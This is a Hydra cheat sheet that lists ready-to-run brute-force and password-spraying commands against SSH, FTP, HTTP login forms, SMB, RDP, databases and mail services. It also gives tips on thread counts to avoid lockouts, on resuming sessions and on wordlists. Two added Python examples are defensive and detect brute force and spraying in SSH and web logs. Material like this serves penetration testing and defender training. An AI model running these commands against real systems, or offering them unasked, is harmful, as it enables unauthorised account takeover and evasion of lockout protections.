Hydra Cheat Sheet

Complete Password Brute Force Reference

50+ protocols • SSH, HTTP, FTP, RDP, databases and more

📅 Updated: December 2024 · ⏱️ 20 min read · 🔧 Hydra 9.5+

What is Hydra?

THC-Hydra (commonly called Hydra) is a fast, parallelized login cracker that supports numerous protocols. Developed by The Hacker's Choice (THC), it's one of the most versatile password testing tools available, supporting over 50 different protocols including SSH, FTP, HTTP, HTTPS, SMB, databases, and many more.

Hydra is pre-installed on Kali Linux and other security-focused distributions. Source code is available on GitHub.

📦 Installation

Debian/Ubuntu/Kali

sudo apt install hydra

RHEL/CentOS/Fedora

sudo dnf install hydra

macOS (Homebrew)

brew install hydra

From Source

git clone https://github.com/vanhauser-thc/thc-hydra
cd thc-hydra && ./configure && make && sudo make install

🎯 Basic Syntax

hydra [options] <target> <protocol>
Flag      Description                                          Example
-l        Single username                                      -l admin
-L        Username list file                                   -L users.txt
-p        Single password                                      -p password123
-P        Password list file                                   -P rockyou.txt
-C        Colon-separated user:pass file (instead of -L/-P)    -C creds.txt
-s        Port number (if not the protocol default)            -s 2222
-t        Parallel tasks (threads) per target                  -t 16
-f        Stop on first valid pair (per host when using -M)    -f
-F        Stop on first valid pair on any host (global)        -F
-v / -V   Verbose / show each login+password attempt           -V
-o        Write found pairs to a file                          -o results.txt
-e nsr    Try null (n), same-as-login (s), reversed (r) pass   -e nsr
-M        Target list file, one host per line                  -M hosts.txt

📡 Supported Protocols

Run hydra -h to see all available protocols. Common ones include:

ssh ftp telnet http-get http-post-form https-get https-post-form smb rdp vnc mysql mssql postgres oracle mongodb ldap2 smtp pop3 imap snmp redis memcached

🔐 SSH Attacks

# Single username, password list
hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://<target>

# Username list, password list
hydra -L users.txt -P passwords.txt ssh://<target>

# Custom port
hydra -l admin -P passwords.txt -s 2222 ssh://<target>

# Try null, same as login, reversed
hydra -l root -P passwords.txt -e nsr ssh://<target>

# Verbose with 4 threads
hydra -l root -P passwords.txt -t 4 -V ssh://<target>

# Alternative syntax
hydra -l root -P passwords.txt <target> ssh

💡 Pro Tip

SSH servers typically rate-limit authentication attempts per connection and ban sources that fail repeatedly. Use -t 4 (4 threads) to avoid triggering account lockouts and connection bans; Hydra itself prints a warning recommending -t 4 for the ssh module.
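The rate limiting described above is also the defender's signal: a burst of failed logins from one source within a short window. The following Python is an added example (not code from this page or from the Hydra project) that parses constructed sshd log lines and separates a single-account brute force from a password spray (the scenario listed later under Common Attack Scenarios); the 60-second window, the thresholds and the log year 2024 are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Two shapes sshd logs for a rejected login (constructed samples below).
FAILED = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?:Failed password for (?:invalid user )?|Invalid user )"
    r"(?P<user>\S+) from (?P<src>[\d.]+)"
)

def parse_failures(lines, year=2024):
    """Yield (timestamp, source, username) per failed login; syslog lines
    carry no year, so one is assumed (2024 here)."""
    for line in lines:
        m = FAILED.match(line)
        if m:
            stamp = " ".join(m["ts"].split())  # collapse "Dec  3" padding
            ts = datetime.strptime(f"{year} {stamp}", "%Y %b %d %H:%M:%S")
            yield ts, m["src"], m["user"]

def detect(lines, window_s=60, threshold=10, spray_users=5):
    """Sliding-window count of failures per source. A source reaching
    `threshold` failures inside `window_s` is 'brute-force' when it hammers
    few accounts and 'spray' when it touches >= spray_users distinct ones."""
    recent = defaultdict(list)  # src -> [(ts, user)] inside the window
    verdicts = {}
    for ts, src, user in parse_failures(lines):
        hist = recent[src]
        hist.append((ts, user))
        while (ts - hist[0][0]).total_seconds() > window_s:
            hist.pop(0)
        if len(hist) >= threshold:
            users = {u for _, u in hist}
            verdicts[src] = "spray" if len(users) >= spray_users else "brute-force"
    return verdicts

# Constructed sample: 12 root failures from one source (the -l root -P pattern),
# 10 different usernames from another (the -L users.txt -p pattern), one stray.
SAMPLE = [
    f"Dec  3 10:15:{i:02d} bastion sshd[1234]: Failed password for root "
    f"from 203.0.113.7 port 4{i:04d} ssh2" for i in range(12)
] + [
    f"Dec  3 10:16:{i:02d} bastion sshd[1235]: Invalid user {u} "
    f"from 198.51.100.9 port 5{i:04d}"
    for i, u in enumerate("alice bob carol dave erin frank grace heidi ivan judy".split())
] + ["Dec  3 10:17:00 bastion sshd[1236]: Failed password for admin "
     "from 192.0.2.4 port 60000 ssh2"]

if __name__ == "__main__":
    print(detect(SAMPLE))  # {'203.0.113.7': 'brute-force', '198.51.100.9': 'spray'}
```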

📁 FTP Attacks

# Basic FTP attack
hydra -l admin -P passwords.txt ftp://<target>

# Try anonymous login first
hydra -l anonymous -p anonymous ftp://<target>

# Multiple users with verbose output
hydra -L users.txt -P passwords.txt -V ftp://<target>

# Stop on first success
hydra -l ftpuser -P passwords.txt -f ftp://<target>

🌐 HTTP Form Attacks

HTTP form attacks require understanding the login form structure. You need three things: the form path, the POST parameter names, and a string that identifies a failed (F=) or successful (S=) login in the server's response.

Syntax

hydra -l <user> -P <wordlist> <target> http-post-form "/path:user=^USER^&pass=^PASS^:F=failure_string"
Placeholder   Description
^USER^        Replaced with each username tried
^PASS^        Replaced with each password tried
F=string      Failure condition: string present in the response to a failed login
S=string      Success condition: string present in the response to a successful login

Examples

# Basic login form
hydra -l admin -P passwords.txt <target> http-post-form "/login:username=^USER^&password=^PASS^:F=Invalid"

# WordPress login
hydra -l admin -P passwords.txt <target> http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^:F=Invalid username"

# With cookies
hydra -l admin -P passwords.txt <target> http-post-form "/login:user=^USER^&pass=^PASS^:F=failed:H=Cookie: PHPSESSID=abc123"

# HTTPS target
hydra -l admin -P passwords.txt <target> https-post-form "/login:user=^USER^&pass=^PASS^:F=incorrect"

# Using success condition instead
hydra -l admin -P passwords.txt <target> http-post-form "/login:user=^USER^&pass=^PASS^:S=Welcome"

⚠️ Finding Form Parameters

Use browser DevTools (Network tab) or Burp Suite to capture the actual POST request. Look for the form action URL and input field names.
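The F=/S= logic above has a mirror image on the server side: a form brute force shows up in the access log as a burst of POSTs to the login path from one source, nearly all returning the same status and response size, and a successful guess is the response that breaks that pattern. The following Python is an added example (not code from this page or the Hydra project) that runs that check over constructed combined-format access log lines; the login path, window and threshold are assumptions.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime

# Combined-format access line: source, timestamp, request line, status, bytes.
LINE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+)'
)

def parse(lines):
    """Yield (ts, src, method, path, status, size) for each well-formed line."""
    for line in lines:
        m = LINE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
            yield (ts, m["src"], m["method"], m["path"].split("?")[0],
                   m["status"], int(m["size"]))

def detect(lines, login_path="/login", window_s=60, threshold=20):
    """Flag sources that POST to login_path >= threshold times in window_s.
    The dominant (status, size) pair is the failure page that an F= string
    keys on; any response that breaks the pattern is what S= would treat as
    a hit, so it is reported as an outlier worth checking."""
    recent = defaultdict(list)  # src -> [(ts, status, size)] in the window
    reports = {}
    for ts, src, method, path, status, size in parse(lines):
        if method != "POST" or path != login_path:
            continue
        hist = recent[src]
        hist.append((ts, status, size))
        while (ts - hist[0][0]).total_seconds() > window_s:
            hist.pop(0)
        if len(hist) >= threshold:
            shape = Counter((s, z) for _, s, z in hist).most_common(1)[0][0]
            reports[src] = {
                "attempts": len(hist),
                "failure_shape": shape,
                "outliers": [(s, z) for _, s, z in hist if (s, z) != shape],
            }
    return reports

# Constructed sample: 25 identical failed POSTs in 25 s, then one 302 (the
# redirect a successful login produces), plus an unrelated GET from elsewhere.
SAMPLE = [
    f'203.0.113.7 - - [03/Dec/2024:10:15:{i:02d} +0000] "POST /login HTTP/1.1" '
    f'200 1534 "-" "Mozilla/5.0"' for i in range(25)
] + [
    '203.0.113.7 - - [03/Dec/2024:10:15:25 +0000] "POST /login HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [03/Dec/2024:10:15:30 +0000] "GET /login HTTP/1.1" 200 1534 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    print(detect(SAMPLE))
```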

🔒 HTTP Basic Authentication

# HTTP Basic Auth
hydra -l admin -P passwords.txt <target> http-get /admin/

# HTTPS Basic Auth
hydra -l admin -P passwords.txt <target> https-get /secure/

# With port specification
hydra -l admin -P passwords.txt -s 8080 <target> http-get /

💼 SMB/Windows Attacks

# SMB attack
hydra -l Administrator -P passwords.txt smb://<target>

# With domain
hydra -l DOMAIN\\Administrator -P passwords.txt smb://<target>

# RDP attack (slow, use few threads)
hydra -l administrator -P passwords.txt -t 1 rdp://<target>

# VNC (password only, no username)
hydra -P passwords.txt vnc://<target>

🗄️ Database Attacks

# MySQL
hydra -l root -P passwords.txt mysql://<target>

# PostgreSQL
hydra -l postgres -P passwords.txt postgres://<target>

# Microsoft SQL Server
hydra -l sa -P passwords.txt mssql://<target>

# Oracle SID required
hydra -l system -P passwords.txt oracle://<target>/XE

# MongoDB
hydra -l admin -P passwords.txt mongodb://<target>

# Redis (password only)
hydra -P passwords.txt redis://<target>

📧 Email Protocols

# SMTP
hydra -l user@domain.com -P passwords.txt smtp://<target>

# SMTP with TLS
hydra -l user@domain.com -P passwords.txt -S smtp://<target>:587

# POP3
hydra -l user -P passwords.txt pop3://<target>

# POP3S (SSL)
hydra -l user -P passwords.txt pop3s://<target>

# IMAP
hydra -l user -P passwords.txt imap://<target>

# IMAPS (SSL)
hydra -l user -P passwords.txt imaps://<target>

⚡ Performance Tuning

Flag      Description                                                  Default
-t N      Number of parallel tasks (threads) per target                16
-w N      Maximum wait time for a response (seconds)                   32
-c TIME   Wait time per login attempt over all threads (forces -t 1)   -
-W N      Wait time between connects per thread (seconds)              0
-T N      Parallel connects overall across targets (when using -M)     -

Recommended Thread Settings

Service       Threads
SSH           4
HTTP/HTTPS    16-32
FTP           8-16
RDP           1-4

💾 Session Management

Hydra can save and restore sessions for long-running attacks:

# Sessions are auto-saved to hydra.restore in the current working directory

# Resume an interrupted session (run from the same directory)
hydra -R

# Start fresh, ignoring an existing restore file
hydra -I -l admin -P rockyou.txt ssh://<target>

Flag   Description
-R     Restore the previous aborted/crashed session
-I     Ignore an existing restore file (start fresh)

📚 Common Wordlists

On Kali Linux, wordlists are typically located in /usr/share/wordlists/

Wordlist          Path                                                                    Size
RockYou           /usr/share/wordlists/rockyou.txt                                        14M passwords
SecLists Common   /usr/share/seclists/Passwords/Common-Credentials/                       Various
Top 10000         /usr/share/seclists/Passwords/xato-net-10-million-passwords-10000.txt   10K passwords
Default Creds     /usr/share/seclists/Passwords/Default-Credentials/                      Various

💡 Pro Tip

Start with smaller, targeted wordlists before using massive ones like rockyou.txt. Try common defaults first: admin:admin, root:root, user:password.

🔥 Common Attack Scenarios

# Quick default credential check
hydra -C /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt ftp://<target>

# Multiple targets from file
hydra -L users.txt -P passwords.txt -M hosts.txt ssh

# Password spray (one password, many users)
hydra -L users.txt -p 'Summer2024!' smb://<target>

# Service on non-standard port
hydra -l admin -P passwords.txt -s 8022 ssh://<target>

# Output results to file
hydra -l root -P passwords.txt -o results.txt ssh://<target>

# Verbose with all attempts shown
hydra -l admin -P passwords.txt -V ssh://<target>

🔓 Hydra Cheat Sheet Complete!

You now have a comprehensive reference for the most versatile password brute-forcing tool. From SSH to web forms to databases, these commands cover the authentication attacks security professionals use every day.